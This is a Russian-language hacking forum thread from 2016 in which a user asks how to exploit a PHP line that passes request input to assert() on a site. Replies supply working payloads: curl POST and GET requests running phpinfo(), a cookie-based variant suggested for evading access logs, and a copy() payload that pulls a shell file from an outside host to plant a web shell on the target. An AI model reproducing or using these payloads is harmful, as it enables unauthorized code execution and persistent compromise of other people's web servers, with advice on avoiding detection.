HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.04.2016, 15:11
marynli
Новичок
Регистрация: 29.06.2015
Сообщений: 26
Провел на форуме:
9630

Репутация: 0
По умолчанию

Допустим в php файле на сайте есть строка вида:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).

Как можно написать PHP скрипт чтобы использовать данную уязвимость ?

Какой код лучше заливать?
 
Ответить с цитированием

  #2  
Старый 25.04.2016, 15:17
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от marynli  

Допустим в php файле на сайте есть строка вида:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]123123123[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).
Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
Какой код лучше заливать?
в параметр 123123123 пишешь пхп код, он выполняется

curl 'http://site.ru/' --data '123123123=phpinfo();'
 
Ответить с цитированием

  #3  
Старый 25.04.2016, 18:40
strelok20094
Познающий
Регистрация: 26.03.2011
Сообщений: 81
Провел на форуме:
24770

Репутация: 2
По умолчанию

site.com/yourfile.php?123123123=phpinfo();
 
Ответить с цитированием

  #4  
Старый 25.04.2016, 18:49
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от strelok20094  

site.com/yourfile.php?123123123=phpinfo();
get палевно
 
Ответить с цитированием

  #5  
Старый 25.04.2016, 18:52
strelok20094
Познающий
Регистрация: 26.03.2011
Сообщений: 81
Провел на форуме:
24770

Репутация: 2
По умолчанию

Цитата:
Сообщение от t0ma5  

get палевно
а пост беспалевно? вот тебе выдерка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44
 
Ответить с цитированием

  #6  
Старый 25.04.2016, 19:02
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

Цитата:
Сообщение от strelok20094  

а пост беспалевно? вот тебе выдерка из access log
xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44
вот тебе выдержка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44

сам ответь что беспалевней
 
Ответить с цитированием

  #7  
Старый 25.04.2016, 19:08
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию

если уж на то пошло то я бы через куки слал

curl 'http://site.ru' -H 'Cookie: '123123123=phpinfo()'
 
Ответить с цитированием

  #8  
Старый 29.04.2016, 17:02
marynli
Новичок
Регистрация: 29.06.2015
Сообщений: 26
Провел на форуме:
9630

Репутация: 0
По умолчанию

А как запихать туда веб шелл?
 
Ответить с цитированием

  #9  
Старый 29.04.2016, 17:14
private_static
Участник форума
Регистрация: 19.05.2015
Сообщений: 117
Провел на форуме:
25535

Репутация: 22
По умолчанию

Цитата:
Сообщение от marynli  

А как запихать туда веб шелл?
Код:
site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php");
зальётся по пути site.com/shell.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.